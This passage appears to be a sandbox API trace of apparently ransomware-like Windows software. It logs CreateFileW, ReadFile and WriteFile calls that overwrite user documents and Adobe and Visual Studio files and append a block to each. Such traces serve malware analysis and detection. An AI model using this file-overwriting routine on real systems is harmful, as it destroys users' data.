[0060.464] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.464] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x7f4 [0060.464] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.464] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.464] ReleaseMutex (hMutex=0x168) returned 1 [0060.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dialog.zip", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dialog.zip", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dialog.zip", lpUsedDefaultChar=0x0) returned 10 [0060.465] ReadFile (in: hFile=0x1ac, lpBuffer=0x2662a28, nNumberOfBytesToRead=0x7f4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesRead=0x2e9f2bc*=0x7f4, lpOverlapped=0x0) returned 1 [0060.467] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0060.467] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4038*, nNumberOfBytesToWrite=0xd7c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26b4038*, lpNumberOfBytesWritten=0x2e9f2d0*=0xd7c, lpOverlapped=0x0) returned 1 [0060.467] CloseHandle (hObject=0x1ac) returned 1 [0060.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.468] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.468] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x419 [0060.468] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.469] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.469] ReleaseMutex (hMutex=0x168) returned 1 [0060.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SettingsInternal.zip", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0060.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SettingsInternal.zip", cchWideChar=20, lpMultiByteStr=0x1f8867c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SettingsInternal.zip", lpUsedDefaultChar=0x0) returned 20 [0060.469] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec3328, nNumberOfBytesToRead=0x419, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec3328*, lpNumberOfBytesRead=0x2e9f2bc*=0x419, lpOverlapped=0x0) returned 1 [0060.471] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0060.471] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e90038*, nNumberOfBytesToWrite=0x9a1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90038*, lpNumberOfBytesWritten=0x2e9f2d0*=0x9a1, lpOverlapped=0x0) returned 1 [0060.471] CloseHandle (hObject=0x1ac) returned 1 [0060.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\XN Nj6.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g155gr\\xn nj6.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.473] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.473] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe05a [0060.473] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.473] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.473] ReleaseMutex (hMutex=0x168) returned 1 [0060.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XN Nj6.xlsx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XN Nj6.xlsx", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XN Nj6.xlsx", lpUsedDefaultChar=0x0) returned 11 [0060.474] ReadFile (in: hFile=0x1ac, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.475] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xd05a [0060.475] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.475] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xd05a [0060.475] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4038*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.476] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.476] WriteFile (in: hFile=0x1ac, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.476] CloseHandle (hObject=0x1ac) returned 1 [0060.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\RMWR2N xdcNl.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jlhpxbn7\\rmwr2n xdcnl.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.478] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.478] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x981 [0060.478] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.478] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.478] ReleaseMutex (hMutex=0x168) returned 1 [0060.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RMWR2N xdcNl.xls", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0060.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RMWR2N xdcNl.xls", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RMWR2N xdcNl.xls", lpUsedDefaultChar=0x0) returned 16 [0060.479] ReadFile (in: hFile=0x1ac, lpBuffer=0x1e90038, nNumberOfBytesToRead=0x981, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90038*, lpNumberOfBytesRead=0x2e9f2bc*=0x981, lpOverlapped=0x0) returned 1 [0060.480] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0060.480] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4038*, nNumberOfBytesToWrite=0xf09, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26b4038*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf09, lpOverlapped=0x0) returned 1 [0060.480] CloseHandle (hObject=0x1ac) returned 1 [0060.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\Ntc67Bf2iLd3ESzWKwV0.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\ntc67bf2ild3eszwkwv0.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.483] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.483] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x147c1 [0060.483] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.483] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.483] ReleaseMutex (hMutex=0x168) returned 1 [0060.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ntc67Bf2iLd3ESzWKwV0.docx", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0060.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ntc67Bf2iLd3ESzWKwV0.docx", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ntc67Bf2iLd3ESzWKwV0.docx", lpUsedDefaultChar=0x0) returned 25 [0060.484] ReadFile (in: hFile=0x1ac, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.485] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x137c1 [0060.485] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.485] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x137c1 [0060.485] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4038*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.485] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.485] WriteFile (in: hFile=0x1ac, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.486] CloseHandle (hObject=0x1ac) returned 1 [0060.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\rOvmf5QogX.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\rovmf5qogx.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.487] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.488] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3221 [0060.488] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.488] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.488] ReleaseMutex (hMutex=0x168) returned 1 [0060.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rOvmf5QogX.odt", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0060.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rOvmf5QogX.odt", cchWideChar=14, lpMultiByteStr=0x1f732cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rOvmf5QogX.odt", lpUsedDefaultChar=0x0) returned 14 [0060.488] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.489] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2221 [0060.489] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.489] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2221 [0060.490] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec3308*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.490] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.490] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec3308*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.490] CloseHandle (hObject=0x1ac) returned 1 [0060.639] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.639] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.639] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x20cc1 [0060.639] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.639] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.639] ReleaseMutex (hMutex=0x168) returned 1 [0060.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0060.640] ReadFile (in: hFile=0x1ac, lpBuffer=0x1e94048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e94048*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0060.643] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1fcc1 [0060.644] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec0308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec0308*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.645] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1fcc1 [0060.645] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec0308*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec0308*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.646] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.646] WriteFile (in: hFile=0x1ac, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0060.646] CloseHandle (hObject=0x1ac) returned 1 [0060.687] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.687] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.688] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x106d4 [0060.688] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.688] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.688] ReleaseMutex (hMutex=0x168) returned 1 [0060.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0060.688] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec0308, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec0308*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.693] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xf6d4 [0060.693] ReadFile (in: hFile=0x1ac, lpBuffer=0x1e98078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e98078*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.694] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xf6d4 [0060.695] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e94048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e94048*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.695] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.695] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e94048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e94048*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.695] CloseHandle (hObject=0x1ac) returned 1 [0060.873] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.874] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.874] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x43b5 [0060.874] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.874] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.874] ReleaseMutex (hMutex=0x168) returned 1 [0060.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, 